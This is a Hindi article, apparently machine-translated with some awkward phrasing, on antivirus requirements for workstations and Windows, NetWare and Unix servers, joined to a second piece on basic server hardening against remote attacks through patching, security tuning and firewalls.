एक एंटी-वायरस सुरक्षा सर्वर का निर्माण। हैकिंग से सर्वर सुरक्षा

उपरोक्त तर्क और उदाहरणों के आधार पर, हम वर्कस्टेशन के लिए एंटीवायरस के लिए बुनियादी आवश्यकताओं को तैयार कर सकते हैं। यह स्पष्ट है कि विभिन्न वर्गों के कार्यस्थानों के लिए ये आवश्यकताएं अलग-अलग होंगी।

विंडोज वर्कस्टेशन के लिए एंटीवायरस आवश्यकताएँ

पहले की तरह, आवश्यकताओं को कई श्रेणियों में विभाजित किया जाएगा:

  1. सामान्य आवश्यकताएँ- विश्वसनीयता, प्रदर्शन, उपयोग में आसानी, सस्तापन - फिर से दोहराने का कोई मतलब नहीं है
  2. प्राथमिक आवश्यकताएं- मुख्य कार्य के परिणामस्वरूप:
    • कंप्यूटर वायरस को पहचानने और बेअसर करने के लिए - पढ़ने, लिखने, लॉन्च करने के लिए - एक्सेस की जा रही स्थानीय डिस्क पर सभी फाइलों को स्कैन करना
    • हटाने योग्य और नेटवर्क ड्राइव की जाँच करना
    • मेमोरी चेक
    • वायरस के लिए इनकमिंग और आउटगोइंग संदेशों की जाँच, दोनों संदेशों को स्वयं और उनके अनुलग्नकों की जाँच की जानी चाहिए
    • वेब पेजों के स्क्रिप्ट और अन्य सक्रिय तत्वों की जाँच करना
    • Microsoft Office दस्तावेज़ों और अन्य अनुप्रयोगों की फ़ाइलों में मैक्रोज़ की जाँच करना
    • स्कैनिंग कंपाउंड फाइल्स - आर्काइव्स, सेल्फ-एक्सट्रैक्टिंग आर्काइव्स, पैक्ड एक्जीक्यूटेबल फाइल्स, मेल डेटाबेस, मेल फॉर्मेट फाइल्स, ओएलई कंटेनर्स
    • संक्रमित फ़ाइलों पर विभिन्न क्रियाओं का चयन करने की संभावना, सामान्य रूप से:
      • अवरुद्ध करना (वास्तविक समय में जाँच करते समय)
      • लॉगिंग (ऑन डिमांड स्कैन)
      • विलोपन
      • संगरोध
      • इलाज
      • उपयोगकर्ता से कार्रवाई का अनुरोध
    • संक्रमित फाइलों का उपचार
    • संग्रह में संक्रमित फ़ाइलों की सफाई
    • वांछनीय - संभावित अवांछित कार्यक्रमों का पता लगाना (एडवेयर और स्पाइवेयर मॉड्यूल, हैकर टूल्स, आदि)
  3. प्रबंधन की आवश्यकताएं
    • स्थानीय जीयूआई
    • दूरस्थ और केंद्रीकृत प्रबंधन क्षमता (कॉर्पोरेट संस्करण)
    • स्कैन के लॉन्च को शेड्यूल करने और कार्यों को अपडेट करने की क्षमता
    • किसी भी कार्य को शुरू करने या मांग पर कोई कार्रवाई करने की क्षमता (मैन्युअल रूप से)
    • एंटी-वायरस कॉम्प्लेक्स के संबंध में एक अनपेक्षित उपयोगकर्ता के कार्यों को सीमित करने की क्षमता
  4. अपग्रेड आवश्यकताएँ
    • विभिन्न अद्यतन स्रोतों के लिए समर्थन, मानक:
      • HTTP या FTP संसाधन
      • स्थानीय या नेटवर्क फ़ोल्डर
      • केंद्रीकृत अद्यतन प्रणाली (कॉर्पोरेट संस्करणों में)
    • एंटी-वायरस डेटाबेस, एंटी-वायरस इंजन और एप्लिकेशन मॉड्यूल को अपडेट करने की क्षमता
    • मैन्युअल रूप से मांग पर या शेड्यूल पर स्वचालित रूप से अपडेट करने की क्षमता
    • एंटी-वायरस डेटाबेस अपडेट को वापस रोल करने की क्षमता
  5. नैदानिक ​​​​आवश्यकताएं
    • स्थानीय उपयोगकर्ता को इसके बारे में सूचित करना महत्वपूर्ण घटनाएँ- वायरस का पता लगाना, एंटीवायरस की स्थिति बदलना आदि।
    • एंटीवायरस और / या व्यक्तिगत कार्यों के लॉग रखना
    • एंटी-वायरस सुरक्षा व्यवस्थापक अधिसूचना (कॉर्पोरेट संस्करण में)
Linux / Unix वर्कस्टेशन के लिए एंटीवायरस आवश्यकताएँ
  1. सामान्य आवश्यकताएँ- व्यावहारिक रूप से अपरिवर्तित: विश्वसनीयता, प्रदर्शन, कम लागत। यूनिक्स सिस्टम में उपयोगिता का पारंपरिक रूप से विंडोज सिस्टम की तुलना में थोड़ा अलग मानदंडों के अनुसार मूल्यांकन किया जाता है, हालांकि यह स्थिति धीरे-धीरे आवश्यकताओं के एकीकरण की दिशा में बदलने लगी है।
  2. प्राथमिक आवश्यकताएं- उद्देश्य के आधार पर:
    • वायरस के लिए मनमानी फाइलों और निर्देशिकाओं का ऑन-डिमांड स्कैन
    • फ़ाइलों तक पहुँचने के दौरान वास्तविक समय में कुछ निर्देशिकाओं को स्कैन करना वांछनीय है, लेकिन महत्वपूर्ण नहीं है। यदि ऐसी कार्यक्षमता वास्तव में आवश्यक है, तो हम वर्कस्टेशन के बारे में इतनी बात नहीं कर रहे हैं जितना कि सर्वर के बारे में - यूनिक्स सिस्टम में उनके बीच कोई स्पष्ट अंतर नहीं है।
    • यौगिक वस्तुओं में वायरस का पता लगाना - अभिलेखागार, स्वयं निकालने वाले संग्रह, पैक किए गए निष्पादन योग्य मॉड्यूल, पोस्ट डेटाबेस, मेल प्रारूप फ़ाइलें, ओएलई कंटेनर - यूनिक्स पर्यावरण में सामान्य प्रारूपों तक सीमित नहीं हैं
    • संक्रमित फ़ाइलों का पता लगाने पर कार्रवाई का चयन करने की संभावना, सामान्य रूप से:
      • हटाना
      • स्थानांतरित या नाम बदलें
      • इलाज
      • एक रिपोर्ट के लिए जानकारी लिखें
      • उपयोगकर्ता से कार्रवाई के लिए पूछें (मांग पर जांच करते समय)
    • संक्रमित फाइलों का उपचार
    • वांछनीय - अभिलेखागार में उपचार की संभावना
  3. प्रबंधन की आवश्यकताएं
    • कॉन्फ़िगरेशन फ़ाइलों को संपादित करके स्थानीय प्रबंधन
    • वांछनीय - वेब इंटरफेस के माध्यम से रिमोट कंट्रोल
    • कार्यों के शुभारंभ और कार्यों के निष्पादन को निर्धारित करने की क्षमता
    • कार्यों और कार्यों को मैन्युअल रूप से करने की क्षमता
  4. नैदानिक ​​​​आवश्यकताएं
    • कार्य लॉग रखना
    • एंटी-वायरस सुरक्षा व्यवस्थापक सूचना

सर्वर सुरक्षा

आम तौर पर एंटीवायरस सुरक्षासर्वर वर्कस्टेशन सुरक्षा से उतने अलग नहीं हैं जितने वे गेटवे सुरक्षा से हैं, उदाहरण के लिए। उनका मुकाबला करने के लिए मुख्य खतरे और प्रौद्योगिकियां वही रहती हैं - केवल उच्चारणों को स्थानांतरित कर दिया जाता है।

उपयोग किए गए ऑपरेटिंग सिस्टम के अनुसार नेटवर्क सर्वर, जैसे वर्कस्टेशन, स्वाभाविक रूप से कक्षाओं में विभाजित होते हैं:

  • विंडोज सर्वर
  • नोवेल नेटवेयर सर्वर
  • यूनिक्स सर्वर

विभाजन सिद्धांत विभिन्न ऑपरेटिंग सिस्टमों की विशेषता वाले वायरस खतरों के कारण है और, परिणामस्वरूप, एंटीवायरस के मुख्य कार्य को परिभाषित करने में विभिन्न विकल्प हैं।

सर्वर सुरक्षा उत्पादों के मामले में, व्यक्तिगत और नेटवर्क उत्पादों में कोई विभाजन नहीं है - सभी उत्पाद नेटवर्क (कॉर्पोरेट) हैं। कई निर्माताओं के पास वर्कस्टेशन और फ़ाइल सर्वर के लिए कॉर्पोरेट उत्पादों का एक विभाजन भी नहीं है - उनके पास एक ही उत्पाद है।

विशिष्ट खतरे और प्रतिवाद

सभी सर्वर-विशिष्ट खतरे सर्वर ऑपरेटिंग सिस्टम की विशेषताओं के साथ इतने अधिक जुड़े नहीं हैं, जितना कि सर्वर के लिए विशिष्ट कमजोर सॉफ़्टवेयर के उपयोग के साथ।

माइक्रोसॉफ्ट विंडोज सर्वर

विंडोज सर्वर के लिए, विंडोज एनटी / 2000 / एक्सपी के तहत वर्कस्टेशन के लिए सभी समान खतरे प्रासंगिक हैं। सर्वरों के संचालन के प्रमुख तरीके में एकमात्र अंतर है, जिसके परिणामस्वरूप कई अतिरिक्त हमले होते हैं जो वर्कस्टेशन के लिए विशिष्ट नहीं हैं।

इसलिए, उपयोगकर्ता शायद ही कभी सीधे विंडोज सर्वर के पीछे काम करते हैं, जिसका अर्थ है कि मेल क्लाइंट और सर्वर पर कार्यालय अनुप्रयोगों का आमतौर पर उपयोग नहीं किया जाता है। परिणामस्वरूप, स्तर पर मेल सुरक्षा की आवश्यकताएं मेल क्लाइंटऔर मैक्रो वायरस का पता लगाने के अतिरिक्त साधन विंडोज सर्वर के मामले में कम मांग में हैं।

उदाहरण... विंडोज वर्कस्टेशन के लिए कास्परस्की एंटी-वायरस के विपरीत, विंडोज फाइल सर्वर के लिए कास्परस्की एंटी-वायरस में माइक्रोसॉफ्ट ऑफिस दस्तावेजों के साथ काम करते समय निष्पादित मैक्रोज़ के व्यवहार विश्लेषण के लिए एक मॉड्यूल और इनकमिंग और आउटगोइंग मेल को स्कैन करने के लिए एक मॉड्यूल का अभाव है। इसका मतलब यह नहीं है कि उत्पाद में मैक्रो वायरस और मेल वर्म्स के खिलाफ सुरक्षा की कमी है - जैसा कि पहले ही उल्लेख किया गया है, अंत में, सभी खोली गई फाइलों को फाइल सिस्टम रीयल-टाइम प्रोटेक्शन मॉड्यूल द्वारा जांचा जाता है - केवल सर्वर ऑपरेशन की बारीकियों को अतिरिक्त सुरक्षा की आवश्यकता नहीं होती है उपाय, जैसा कि श्रमिकों के स्टेशनों के मामले में था।

दूसरी ओर, विंडोज़ सर्वर वर्कस्टेशन की तुलना में माइक्रोसॉफ्ट जैसी सेवाओं का उपयोग करने की अधिक संभावना रखते हैं एस क्यू एल सर्वरऔर माइक्रोसॉफ्ट आईआईएस। Microsoft (और न केवल Microsoft) द्वारा स्वयं बनाए गए ऑपरेटिंग सिस्टम की तरह, इन सेवाओं में कमजोरियाँ हो सकती हैं, जिनका उपयोग वायरस लेखकों ने अपने समय में कई बार किया था।

उदाहरण... 2003 में, नेट-वर्म .Win32.Slammer वर्म Microsoft SQL Server 2000 में एक भेद्यता का शोषण करते हुए, इंटरनेट पर दिखाई दिया और शाब्दिक रूप से बह गया। Slammer ने अपनी फ़ाइलों को डिस्क पर नहीं सहेजा, लेकिन सीधे SQL सर्वर एप्लिकेशन के एड्रेस स्पेस में निष्पादित किया गया। . कृमि ने फिर एक अंतहीन लूप में नेटवर्क पर यादृच्छिक आईपी पते पर हमला किया, घुसपैठ करने के लिए उसी भेद्यता का फायदा उठाने का प्रयास किया। वर्म की गतिविधि के परिणामस्वरूप, सर्वर और इंटरनेट संचार चैनल इतने ओवरलोड हो गए थे कि नेटवर्क के पूरे खंड दुर्गम थे। दक्षिण कोरिया विशेष रूप से महामारी से बुरी तरह प्रभावित हुआ है। यह ध्यान दिया जाना चाहिए कि कृमि ने प्रजनन के अलावा कोई अन्य कार्य नहीं किया।

उदाहरण... इससे पहले, 2001 में, Microsoft IIS 5.0 में एक भेद्यता का उपयोग नेट-वर्म .Win32 वर्म द्वारा फैलने के लिए किया गया था। कोडरेड स्लैमर वर्म के मामले में महामारी के परिणाम उतने प्रभावशाली नहीं थे, लेकिन कोडरेड .a से संक्रमित कंप्यूटरों की मदद से, यूएस व्हाइट हाउस की वेबसाइट (www.whitehouse.gov) पर एक सफल DDoS प्रयास किया गया था। CodeRed .a भी संक्रमित सर्वर की डिस्क में फ़ाइलें सहेजता नहीं है।

दोनों वर्म्स की ख़ासियत यह है कि फाइल सिस्टम चेक मॉड्यूल (कम से कम अनुरोध पर, कम से कम एक्सेस पर) उनके खिलाफ शक्तिहीन है। बढ़ी हुई नेटवर्क गतिविधि को छोड़कर, ये वर्म्स अपनी प्रतियों को डिस्क पर सहेजते नहीं हैं और सिस्टम में अपनी उपस्थिति बिल्कुल भी नहीं दिखाते हैं। आज तक, सुरक्षा के लिए मुख्य सिफारिश पैच की समय पर स्थापना है ऑपरेटिंग सिस्टमऔर सॉफ्टवेयर का इस्तेमाल किया। एक अन्य दृष्टिकोण फायरवॉल को कॉन्फ़िगर करना है ताकि कमजोर सेवाओं द्वारा उपयोग किए जाने वाले पोर्ट बाहर से दुर्गम हों - स्लैमर सुरक्षा के मामले में एक उचित आवश्यकता, लेकिन कोडरेड सुरक्षा के लिए अस्वीकार्य है।

वर्म्स जो ऑपरेटिंग सिस्टम की पहले से ही कमजोर सेवाओं पर हमला करते हैं, जैसे कि लवसन, सैसर, मायटोब, आदि, विंडोज सर्वर के लिए प्रासंगिक रहते हैं। उनके खिलाफ सुरक्षा व्यापक उपायों द्वारा सुनिश्चित की जानी चाहिए - फायरवॉल का उपयोग करना, पैच स्थापित करना, ऑन-एक्सेस सत्यापन का उपयोग करना (उल्लेखित कीड़े एक सफल हमले के मामले में अपनी फ़ाइलों को आपकी हार्ड ड्राइव में सहेजते हैं)।

हमलों की प्रकृति को देखते हुए, हम यह निष्कर्ष निकाल सकते हैं कि विंडोज सर्वर के लिए मुख्य सुरक्षा उपकरण हैं: ऑन-एक्सेस फाइल स्कैनिंग मॉड्यूल, ऑन-डिमांड फाइल स्कैनिंग मॉड्यूल, स्क्रिप्ट चेकिंग मॉड्यूल, और मुख्य प्रौद्योगिकियां हस्ताक्षर और अनुमानी विश्लेषण हैं (साथ ही साथ) व्यवहार के रूप में - स्क्रिप्ट जाँच मॉड्यूल में) ...

नोवेल नेटवेयर सर्वर

नोवेल नेटवेयर को संक्रमित करने में सक्षम कोई विशिष्ट वायरस नहीं हैं। हालाँकि, कई ट्रोजन हैं जो नोवेल सर्वर तक पहुँच अधिकार चुराते हैं, लेकिन वे अभी भी विंडोज पर चलने के लिए डिज़ाइन किए गए हैं।

तदनुसार, नोवेल नेटवेयर सर्वर के लिए एंटीवायरस वास्तव में इस सर्वर की सुरक्षा के लिए डिज़ाइन नहीं किया गया है। तो, इसके कार्य क्या हैं? वायरस के प्रसार को रोकने में। अधिकांश नोवेल नेटवेयर सर्वर फ़ाइल सर्वर के रूप में उपयोग किए जाते हैं; विंडोज कंप्यूटर के उपयोगकर्ता अपनी फाइलों को ऐसे सर्वर पर स्टोर कर सकते हैं या नोवेल नेटवेयर वॉल्यूम पर स्थित प्रोग्राम चला सकते हैं। नोवेल सर्वर के साझा संसाधनों में वायरस को प्रवेश करने से रोकने के लिए, या ऐसे संसाधनों से वायरस लॉन्च/पढ़ने के लिए, एक एंटीवायरस की आवश्यकता होती है।

तदनुसार, नोवेल नेटवेयर के लिए एंटीवायरस में उपयोग किए जाने वाले मुख्य उपकरण ऑन-एक्सेस स्कैन और ऑन-डिमांड स्कैन हैं।

नोवेल नेटवेयर के लिए एंटीवायरस में उपयोग की जाने वाली विशिष्ट तकनीकों में से, सर्वर पर दुर्भावनापूर्ण प्रोग्राम लिखने वाले स्टेशनों और / या उपयोगकर्ताओं को अवरुद्ध करने पर ध्यान देना आवश्यक है।

यूनिक्स सर्वर

यूनिक्स सर्वरों के बारे में नोवेल नेटवेयर सर्वरों के बारे में भी यही कहा जा सकता है। यूनिक्स सर्वरों के लिए एंटीवायरस सर्वरों को संक्रमण से बचाने की समस्या को उतना हल नहीं करता जितना कि सर्वर के माध्यम से वायरस के प्रसार को रोकने की समस्या। ऐसा करने के लिए, सभी समान दो बुनियादी उपकरणों का उपयोग किया जाता है:

  • ऑन-डिमांड फ़ाइल स्कैनिंग
  • पहुँच पर फ़ाइलों की जाँच करना

उदाहरण... यूनिक्स / लिनक्स फ़ाइल सर्वर के लिए कास्परस्की एंटी-वायरस में एक ऑन-एक्सेस स्कैन मॉड्यूल शामिल है, जबकि लिनक्स वर्कस्टेशन के लिए कास्परस्की एंटी-वायरस में ऐसा मॉड्यूल नहीं है। यह लिनक्स वर्कस्टेशन और सर्वर के विभिन्न कार्यों के कारण है - लिनक्स स्टेशनों पर विशेष रूप से (या अधिकतर) बनाए गए नेटवर्क में, वायरस से संक्रमण का व्यावहारिक रूप से कोई खतरा नहीं है, और इसलिए सभी फाइलों को नियंत्रित करने वाले मॉड्यूल की तत्काल आवश्यकता नहीं है संचालन। इसके विपरीत, यदि एक लिनक्स कंप्यूटर सक्रिय रूप से फाइलों को स्टोर और ट्रांसफर करने के लिए उपयोग किया जाता है (विशेषकर विंडोज नेटवर्क पर), तो यह वास्तव में एक सर्वर है और इसके लिए धन की आवश्यकता होती है निरंतर निगरानीफ़ाइलें।

लिनक्स के तहत कई जाने-माने वर्म्स ऑपरेटिंग सिस्टम में ही नहीं, बल्कि सिस्टम और एप्लिकेशन सॉफ्टवेयर में - wu-ftpd ftp सर्वर में, Apache वेब सर्वर में कमजोरियों को फैलाने के लिए उपयोग करते हैं। यह स्पष्ट है कि ऐसे एप्लिकेशन वर्कस्टेशन की तुलना में सर्वर पर अधिक बार उपयोग किए जाते हैं, जो कि सर्वर सुरक्षा उपायों को बढ़ाने के पक्ष में एक अतिरिक्त तर्क है।

नोवेल सर्वरों के विपरीत, जहां माइक्रोसॉफ्ट नेटवर्किंग के लिए समर्थन अंतर्निहित है, यूनिक्स सर्वर डिफ़ॉल्ट रूप से एसएमबी / सीआईएफएस फ़ाइल स्थानांतरण को संभालने के लिए डिज़ाइन नहीं किए गए हैं। इस उद्देश्य के लिए, एक विशेष सॉफ्टवेयर पैकेज का उपयोग किया जाता है - सांबा, जो आपको Microsoft नेटवर्क के साथ संगत साझा संसाधन बनाने की अनुमति देता है।

यदि फ़ाइलों का आदान-प्रदान केवल SMB / CIFS प्रोटोकॉल का उपयोग करके किया जाता है, तो जाहिर है कि सभी फ़ाइल संचालन को नियंत्रित करने का कोई मतलब नहीं है, यह केवल सांबा सर्वर का उपयोग करके स्थानांतरित की गई फ़ाइलों की जांच करने के लिए पर्याप्त है।

उदाहरण... Kaspersky Lab की उत्पाद श्रृंखला में एक विशेष समाधान शामिल है - सांबा सर्वर के लिए Kaspersky Anti-Virus, जिसे विशेष रूप से सांबा सॉफ़्टवेयर का उपयोग करके यूनिक्स सर्वर पर बनाए गए साझा फ़ोल्डरों की सुरक्षा के लिए डिज़ाइन किया गया है। इस उत्पाद में एक मॉड्यूल शामिल नहीं है जो फ़ाइल संचालन को नियंत्रित करता है; इसके बजाय, यह सांबा में निर्मित एक फ़िल्टर का उपयोग करता है जो सभी स्थानांतरित फ़ाइलों को रोकता है।


इस लेख में, मैं सर्वर पर कुछ प्रकार के हमलों और सर्वर को हैकर्स से बचाने के साधनों को एकत्र करना चाहूंगा। सुरक्षा के विषय पर कई किताबें और लेख लिखे गए हैं। इस लेख का फोकस इस पर है बुनियादी त्रुटियांउन्हें खत्म करने के लिए प्रशासक और समाधान। इस लेख को पढ़ने और अपने सर्वर की जांच करने के बाद, प्रशासक भी ठीक से सो नहीं पाएगा, वह केवल इतना कह सकता है कि मैंने "उम्मीदवार न्यूनतम" पास किया है।

प्रशासकों को तीन कहावतें याद रखें,
नहीं! बेहतर होगा कि उन्हें प्रिंट करें और उन्हें अपने कार्यस्थल पर अपनी आंखों के सामने टांग दें:
"सुरक्षा एक प्रक्रिया है",
"जब व्यवस्थापक के पास करने के लिए कुछ नहीं होता है, तो वह सुरक्षा से संबंधित होता है",
"सुरक्षा को सबसे कमजोर कड़ी द्वारा परिभाषित किया जाता है"
लेख admins * nix + Apache + PHP + Perl + (MySQL | PostgreSQL) पर केंद्रित है और सर्वर को दूरस्थ हमलों से बचाता है, अन्य व्यवस्थापकों के लिए लेख, मुझे आशा है, विचार के लिए भोजन होगा।
विभिन्न पुस्तकों में हैकर हमलों के विभिन्न वर्गीकरण हैं, मैं अपने विभाजन को सभी हमलों के दो सशर्त वर्गों में पेश करूंगा, उन्हें अनग्रुप कर दूंगा:

  • उन सेवाओं पर हमला करना जो इंटरनेट पर असुरक्षित और सुलभ हैं

मेरे विभाजन को समझने के लिए, कल्पना कीजिए कि एक काल्पनिक स्क्रिप्ट है जो पोर्ट 80 पर अपाचे पर दूरस्थ रूप से हमला करती है और हमले के परिणामस्वरूप अपाचे अपना काम समाप्त कर देता है और आप अपनी साइट के बिना रह जाते हैं, क्योंकि वेब पेज देने वाला कोई नहीं है। आपके मेल सर्वर सेंडमेल को वीआरएफवाई के लिए एक पैरामीटर के रूप में 1000 वर्ण भेजे गए थे, एक संक्षिप्त उपयोगकर्ता नाम नहीं, सेंडमेल इस विकास की उम्मीद नहीं कर रहा था और बंद हो गया, जिससे आप बिना मेल के रह गए। इस सशर्त वर्ग के हमलों का सामान्य अर्थ यह है कि कुछ अनुप्रयोग भेद्यता का शोषण किया जाता है। और तीन तरीके हैं -

  • पथ 1) एप्लिकेशन क्रैश हो जाएगा और सेवा उपलब्ध नहीं होगी, DoS स्थिति;
  • रास्ता 2) एप्लिकेशन संसाधनों को हथियाना शुरू कर देगा और उन्हें समाप्त करने के बाद, एक DoS करेगा;
  • पथ 3) एप्लिकेशन को शेलकोड खिलाया जाएगा और हमलावर का कोड निष्पादित किया जाएगा;

ये सभी सेवा पर हमले हैं (p.1) और इनका इलाज केवल एक ही तरीके से किया जाता है: व्यवस्थापक जल्दी से एक भेद्यता की उपस्थिति के बारे में डेवलपर से सीखता है और इस कार्यक्रम को अपडेट करता है।

बिंदु 2 हमला तब होता है जब एक निश्चित प्रोग्रामिंग भाषा में कार्यान्वित एक गतिशील सेवा, पैरामीटर प्राप्त करने की अनुमति देती है और उन्हें जांचे बिना, उन्हें निष्पादित करती है। उदाहरण के लिए, एक ब्राउज़र का उपयोग करते हुए, एक हमलावर, अपाचे द्वारा संचालित साइट के चारों ओर रेंगता है, साइट में ही कमजोरियों की तलाश करता है और जो वह चाहता है उसे प्राप्त करने के लिए उनका शोषण करता है। टीसीएल में लिखा गया, आईआरसी सर्वर चैनल को मॉडरेट करने के लिए बॉट उपयोगकर्ता से अनुरोध स्वीकार करता है (नए उपाख्यान की संख्या, मौसम प्रदर्शित करने के लिए दिन की तारीख) और हैकर, बॉट के प्रोग्राम कोड (रिवर्स इंजीनियरिंग) के काम को फिर से बनाना ), उन अनुरोधों का निर्माण करता है जिन पर बॉट लेखक द्वारा ध्यान नहीं दिया गया था।

पूछें कि यह कैसा है? तो आपको निश्चित रूप से इस लेख की आवश्यकता है। एक तरह से या किसी अन्य, थोड़ा नीचे सब कुछ वर्णित किया जाएगा।

कमजोर सेवाओं और सर्वर पर ही हमला

इस खंड में वे सभी हमले शामिल हैं जो सिस्टम और सेवाओं को प्रभावित करते हैं। अक्सर इस तरह के हमले कार्यक्रम के कार्यान्वयन में त्रुटियों से संभव होते हैं, जैसे बफर ओवरफ्लो। संक्षेप में, यह इस तरह दिखता है, मान लें कि खराब लिखे गए एफ़टीपी सर्वर में एक निश्चित संख्या में वर्णों (उदाहरण के लिए, 10) के लिए उपयोगकर्ता नाम के लिए एक सरणी (बफर) है, और इस तरह के एफ़टीपी सर्वर को एक बीमार से 100 वर्ण प्राप्त होते हैं। - काश, अगर एफ़टीपी सर्वर कोड में ऐसी स्थिति नहीं होती है, तो बफर ओवरफ्लो होता है।

तो हैकर्स स्थानीय बफर ओवरफ्लो के साथ क्या करते हैं? आप एक दुर्भावनापूर्ण कोड के साथ वापसी पते को अधिलेखित कर सकते हैं। दूरस्थ रूप से यह स्थानीय रूप से लक्ष्य प्रणाली पर मनमाने कोड को निष्पादित करने की अनुमति देता है, यदि प्रोग्राम को रूट के रूप में चलाया जाता है, तो यह सिस्टम व्यवस्थापक विशेषाधिकार प्राप्त करेगा। कोड जो बफर ओवरफ्लो का कारण बनता है और हैकर के लिए क्रिया करता है उसे शेल कोड कहा जाता है। शेल कोड लिखना एक आसान काम नहीं है और हैकर से असेंबलर के ज्ञान की आवश्यकता होती है, जिसका अर्थ है इस क्षेत्र में व्यावसायिकता।

असुरक्षित सेवाओं और स्वयं सर्वर पर हमलों से सुरक्षा

  • अद्यतन... यह सीखना आवश्यक है कि पूरे सिस्टम को कैसे अपडेट किया जाए और इसलिए
    * निक्स के लिए "बिल्ड द वर्ल्ड एंड कर्नेल", लिनक्स बैच सिस्टम के माध्यम से अपडेट करें और लाइसेंस प्राप्त एमएस विंडोज के लिए विंडोज अपडेट में अपडेट बटन को दबाने में सक्षम हों। FreeBSD व्यवस्थापकों के लिए, आपको पोर्ट का उपयोग करके सॉफ़्टवेयर स्थापित करने में सक्षम होना चाहिए। यह आपको डेवलपर्स के साथ जाने में मदद करेगा, न कि उनके खिलाफ।

    एमएस विंडोज व्यवस्थापकों को एमएसआई वितरण प्रारूप का उपयोग करने और अक्सर उपयोग करने की आवश्यकता होती है, जो कि माइक्रोसॉफ्ट द्वारा अत्यधिक अनुशंसित है और एक पुराने पैकेज को नए के साथ अपडेट करने का समर्थन करता है। आप अपने सर्वर पर जो कुछ भी करते हैं, अपने आप से प्रश्न पूछें, यदि इस प्रोग्राम का कोई नया संस्करण है, तो इसे अपडेट करना कितना आसान है? आपको एक ऐसा समाधान बनाना होगा जिसे आप पूरी तरह से नियंत्रित करते हैं, हां ऐसी परियोजनाएं हैं जिनके अपने विकास या पैच हैं, लेकिन यदि आपके विकास के लिए एक निश्चित संस्करण पर आपको आवश्यक अनुप्रयोगों को फ्रीज करने की आवश्यकता है और आप अपने पैच को नई प्रणाली पर लागू नहीं कर सकते हैं - ऐसा समाधान इसके लायक नहीं है!

    मैं यहां एक गीतात्मक विषयांतर करूंगा और आपको बताऊंगा कि मुझे खुद को कैसे तोड़ना पड़ा। इंटरनेट पर लेख पढ़ने के बाद, जो आमतौर पर इस तरह से शुरू होता है "स्रोत डाउनलोड करें और इसे स्थापित करें"। तो, आगे क्या है? नया संस्करणआप कैसे शर्त लगाएंगे? पुराने वर्जन को रखें तो इसमें मेक (डी | अन) इंस्टॉल करें? और नए में फिर से स्थापित करें? ये सवाल मेरे दोस्त दिमित्री डबरोविन ने तब पूछे थे जब हमने फ्रीबीएसडी में महारत हासिल करना शुरू किया था। मुझे एहसास होने लगा कि वह सही था, और, कम से कम मुफ्त में, यह रास्ता उपयुक्त नहीं था और, फ्रीबीएसडी डेवलपर्स के मार्ग का अनुसरण नहीं करते हुए, मैं केवल अपने लिए चीजों को जटिल बना रहा था।

    अब जब आपने फ्रीबीएसडी में महारत हासिल कर ली है, जब कुछ कमांड फ्री कर्नेल और पूरे सिस्टम के लिए नए स्रोत डाउनलोड करते हैं, तो कुछ कमांड एक नई दुनिया और कर्नेल बनाते हैं, और फिर सिस्टम में पोर्ट और एप्लिकेशन अपडेट हो जाते हैं, आप शुरू करते हैं * निक्स सिस्टम की शक्ति को समझने के लिए। जब आप फ्रीबीएसडी के साथ एक सर्वर को पुरानी शाखा से वर्तमान शाखा में अपग्रेड करते हैं, तो सिस्टम की दुनिया का पुनर्निर्माण करते हैं, जब सिस्टम खुद को नए स्रोतों से संकलित करता है (ऐसा लगता है कि मुनचूसन ने खुद को बालों से खींच लिया है) और अपग्रेड से पहले काम करने वाली हर चीज "बिना फाइल" के भी काम करती है।

    जैसा कि आप पहले ही समझ चुके हैं, आपके व्यवसाय का समर्थन करने वाले सॉफ़्टवेयर के डेवलपर्स से सुरक्षा मेलिंग की सदस्यता लेना और समय-समय पर अपडेट होना अनिवार्य है। सब कुछ और सभी के नवीनीकरण को सम्मानित किया जाना चाहिए और ट्रैक पर रखा जाना चाहिए।

  • सुरक्षा ट्यूनिंग... अधिकांश सर्वर ऑपरेटिंग सिस्टम इंटरनेट के कठोर "रासायनिक" वातावरण में संचालित करने के लिए डिफ़ॉल्ट रूप से पर्याप्त रूप से कॉन्फ़िगर नहीं किए गए हैं। हैकर्स को आपके सर्वर पर "धोखाधड़ी" से रोकने के लिए, आपको सुरक्षा को ट्यून करने की आवश्यकता है, अर्थात् सुरक्षा के लिए ऑपरेटिंग सिस्टम निर्माता की सिफारिशों को पढ़ें। * निक्स सिस्टम के व्यवस्थापक मैन सिक्योरिटी को कॉल कर सकते हैं और डेवलपर्स की सलाह को पढ़ने के बाद, एक परी कथा को सच कर सकते हैं। लेकिन ऑपरेटिंग सिस्टम जो भी हो, आपको सुरक्षा ट्यूनिंग के बाद सर्वर और सेवाओं के संचालन का पूरी तरह से परीक्षण करने की आवश्यकता है।
  • फ़ायरवॉल... कॉन्फ़िगर किया गया फ़ायरवॉल, जिसे आपने व्यक्तिगत रूप से पोर्ट स्कैनर जैसे कि nmap और भेद्यता स्कैनर का उपयोग करके चेक किया था, यदि इन कार्यक्रमों से आउटपुट है, तो क्या आप सभी समझते हैं कि क्या है प्रश्न में? फ़ायरवॉल को कॉन्फ़िगर करते समय, याद रखें कि इसके नियमों को बायपास करने के कई तरीके हैं। उदाहरण के लिए, फ़ायरवॉल द्वारा संरक्षित एक स्थानीय नेटवर्क है, पैकेट विखंडन को प्रतिबंधित करने के लिए ध्वज सेट करके, कुछ स्थितियों में, आप स्थानीय नेटवर्क में गंतव्य तक पहुंच सकते हैं। या व्यवस्थापक की एक सामान्य गलती, अपने स्वयं के सर्वर के आउटगोइंग पैकेट पर अत्यधिक विश्वास।

    एक वास्तविक स्थिति की कल्पना करें, दुश्मन कोड हैकर-मास्टर के मेजबान के साथ एक कनेक्शन शुरू करने की कोशिश कर रहा है, और आपके पास फ़ायरवॉल में एक नियम है "मेरे द्वारा इंटरनेट पर सब कुछ की अनुमति है।" फ़ायरवॉल के लिए नियम बनाते समय, आपको अपने और दूरस्थ ग्राहकों के बीच अपनी सेवाओं के नेटवर्क संचार की पूरी तस्वीर की पूरी तरह से कल्पना करने की आवश्यकता है।

